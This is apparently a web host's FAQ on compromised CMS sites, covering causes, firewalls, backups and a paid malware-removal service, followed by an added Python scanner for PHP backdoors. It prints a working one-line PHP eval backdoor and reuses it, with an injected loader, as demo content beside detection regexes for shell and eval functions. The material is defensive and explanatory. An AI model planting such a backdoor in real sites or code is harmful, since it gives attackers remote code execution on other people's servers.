14th April, 2016
I've just received notification of malware on my site, what does it mean?
This means that your website's security has been compromised and malicious files have been uploaded to your site's folders. Once uploaded, those files have probably been run automatically. This usually results in more files being downloaded into your site's folders and further code being injected into your existing files. That injected code is known as a 'backdoor': it gives the attacker a way back into the site even after the initial vulnerability is detected and fixed.
How did this happen?
Websites are now mostly built on Content Management Systems (CMS) like WordPress or Joomla, to name the two most popular. These are programs that provide a framework on which you can build a website. CMSs use themes and plugins to customise the site further and get the look and behaviour you want. Over time, vulnerabilities are discovered in the core, in themes and in plugins; sites that have not applied the fixes are then exploited through those known vulnerabilities to upload or inject code that gives the attacker access to your site.
Why do they do this?
There are many reasons, but mostly it comes down to getting the use of a server for free. A compromised site lets them use the server to send spam mail, take part in a DDoS attack, attempt to hack other servers, and so on. This is now quite a large criminal industry.
What should I do to prevent this from happening?
Keep your site's code (core, themes, plugins) up to date; this ensures that at least the older, publicly known vulnerabilities are patched. If you are not the site's developer, put a service contract in place with your developer to manage updates for your site.
If your site is important to your business then use a proxy firewall; we recommend CloudProxy: http://www.myhost.ie/hosting/website-firewall/ This routes all traffic to your site via their servers, where malicious requests can be filtered out before they reach you. It also helps protect a site running outdated code by blocking the requests that exploit known vulnerabilities ('virtual patching'), so to an attacker probing the site the exploit appears to fail. Treat this as a mitigation, not a replacement for applying the updates themselves.
What to do if my site is hacked?
Always have a backup of your site. We cannot stress this enough. We do back up our servers on a 7-day rolling system; however, your site may have been compromised for some time before it was noticed, in which case every copy we hold already contains the malware and our backups are useless to you. We do offer a backup service for clients who wish to keep backups over a longer period; please contact firstname.lastname@example.org about this.
If you don't have access to a known clean backup of your site, we recommend the Malware Removal Service described here: http://www.myhost.ie/hosting/malware-removal/
This is a year-long product that scans all your files and your database and removes any malware code that was injected into them. A scan runs daily on your site, and any malware detections are reported to us and cleaned. Once the site is cleaned you are notified with the list of infected files and recommended steps to secure the site. While the clean-up happens we limit access to your site so that no further malware can be uploaded. Once the site has been cleaned, we give access to you or your developer to update and secure the site before releasing it to the public.
If your site has been compromised and you do not have a known clean backup, the Malware Removal Service is the right option. Simply updating a site that has already been compromised, without first removing what the attacker left behind, is a waste of time and effort: the update closes the original hole but does not remove the extra files, so the site is usually hacked again through a backdoor left from the initial compromise.
Why was my site disabled?
This is not a step we take lightly. However, if your site is on shared hosting and is compromised, we have no option but to protect the server's reputation and, in turn, the reputation of our other clients' websites. On a shared server you share an IP address with the other sites on that server; if that IP address gets blacklisted, every client website on it is blacklisted too. Disabling access to a site does two things: it prevents the malware uploaded to your site from being used to carry out further attacks or send spam (which would get the server's IP address blacklisted), and it prevents your site from being compromised any further.
What does malware look like?
An example of a backdoor:
<?php
// If the request carries a parameter 'e', base64-decode it and run the result as PHP; otherwise exit silently.
// The unquoted index e relies on PHP treating the bare constant as the string 'e' (a notice on PHP 5 and 7, a fatal error on PHP 8).
$_REQUEST[e] ? eval( base64_decode( $_REQUEST[e] ) ) : exit;
This single line of code is found in a file added to the site's code by the attacker, frequently disguised as part of a plugin or a theme. Anyone who knows the file's URL can request it with a parameter 'e' containing base64-encoded PHP, and the site will decode and execute whatever that code is; a request without the parameter simply exits, so to anyone else the file looks like a blank page. If your site has a few hundred PHP files, you can imagine trying to find that one line by hand. This is why we recommend using http://www.myhost.ie/hosting/malware-removal/
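As an added example (not code from this page or from myhost.ie), here is a small Python scanner that does by machine what the paragraph above describes trying by hand: it greps every PHP file for backdoor indicators (eval() fed by base64_decode() or gzinflate(), or fed directly from $_REQUEST/$_GET/$_POST data, or shell functions fed from request data), and it also compares the live site against a sha256 manifest taken from a known clean backup, which catches dropped and modified files regardless of how they are obfuscated and is the reason the earlier sections insist on keeping a clean backup. The plugin and theme names, file contents and the encoded string are constructed for the demo, and the file layout is a WordPress-style guess.

```python
"""Added example: find dropped or modified PHP files on a compromised site.
Check 1 greps PHP files for backdoor indicators; check 2 compares the live
tree against a sha256 manifest taken from a known clean backup."""
import hashlib
import os
import re
import tempfile

# Indicators seen in PHP backdoors: code execution fed from request data, and the
# decoders used to hide the payload from a casual grep for "eval".
SUSPICIOUS = [
    ("eval-of-decoded-data",
     re.compile(r"\beval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    ("request-data-into-eval",
     re.compile(r"\beval\s*\([^;]*\$_(REQUEST|GET|POST|COOKIE)\b", re.I)),
    ("shell-from-request",
     re.compile(r"\b(system|passthru|shell_exec|exec|popen|proc_open)\s*\([^;]*\$_(REQUEST|GET|POST|COOKIE)\b", re.I)),
    ("long-base64-blob", re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]")),
]
PHP_EXTENSIONS = (".php", ".phtml", ".inc")


def scan_file(path):
    """Return (rule, line_number, line) for every suspicious line in one file."""
    hits = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            for rule, pattern in SUSPICIOUS:
                if pattern.search(line):
                    hits.append((rule, lineno, line.strip()))
    return hits


def _walk(root):
    """Yield (relative_path, absolute_path) for every file under root."""
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            yield os.path.relpath(path, root).replace(os.sep, "/"), path


def scan_tree(root):
    """{relative_path: hits} for every PHP file under root with at least one hit."""
    findings = {}
    for rel, path in _walk(root):
        if rel.lower().endswith(PHP_EXTENSIONS):
            hits = scan_file(path)
            if hits:
                findings[rel] = hits
    return findings


def manifest(root):
    """{relative_path: sha256} of every file; build this from the clean backup."""
    result = {}
    for rel, path in _walk(root):
        with open(path, "rb") as fh:
            result[rel] = hashlib.sha256(fh.read()).hexdigest()
    return result


def diff_against_baseline(root, baseline):
    """Files the clean-backup manifest does not account for: (added, modified)."""
    current = manifest(root)
    added = sorted(p for p in current if p not in baseline)
    modified = sorted(p for p in current if p in baseline and current[p] != baseline[p])
    return added, modified


# Constructed sample content: hypothetical plugin/theme names, not real code.
# The base64 text in the injected loader is arbitrary filler, not a real payload.
CLEAN_PLUGIN = "<?php\nfunction seo_tools_title($t) { return htmlspecialchars($t); }\n"
THEME_FOOTER = "<?php\nwp_footer();\n"
DROPPED_BACKDOOR = "<?php\n$_REQUEST[e] ? eval( base64_decode( $_REQUEST[e] ) ) : exit;\n"
INJECTED_LOADER = "eval(gzinflate(base64_decode('eJyLzs3MK8lIzUvOz0tMLVIAAC6kBbM=')));\n"


def _write(root, rel, body, append=False):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "a" if append else "w", encoding="utf-8") as fh:
        fh.write(body)


def demo():
    """Build a clean site, snapshot it, compromise it, then run both checks."""
    root = tempfile.mkdtemp()
    _write(root, "wp-content/plugins/seo-tools/seo-tools.php", CLEAN_PLUGIN)
    _write(root, "wp-content/themes/mytheme/footer.php", THEME_FOOTER)
    baseline = manifest(root)  # what a clean backup would have recorded
    # The compromise: one new file disguised as plugin code, one existing file injected.
    _write(root, "wp-content/plugins/seo-tools/class-cache.php", DROPPED_BACKDOOR)
    _write(root, "wp-content/themes/mytheme/footer.php", INJECTED_LOADER, append=True)
    return scan_tree(root), *diff_against_baseline(root, baseline)


if __name__ == "__main__":
    findings, added, modified = demo()
    for rel, hits in findings.items():
        for rule, lineno, line in hits:
            print(f"{rel}:{lineno}: {rule}: {line}")
    print("added since clean backup:", added)
    print("modified since clean backup:", modified)
```

Pattern matching alone misses backdoors that split keywords across strings, hide in non-PHP files or use functions not on the list, and it will flag some legitimate code (compression or template libraries, cache files), so treat a hit as something to read, not something to delete blindly. The manifest comparison has no such blind spot for added or changed files, but it only works with a copy taken before the compromise; that is the practical reason to keep backups for longer than a rolling week.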
To avoid the expense and pain of having to deal with malware on your site, keep it up to date (core, themes, plugins etc.) and keep a known clean backup of your site. If you want us to look after your backups for you, contact email@example.com and we can provide you with a few solutions.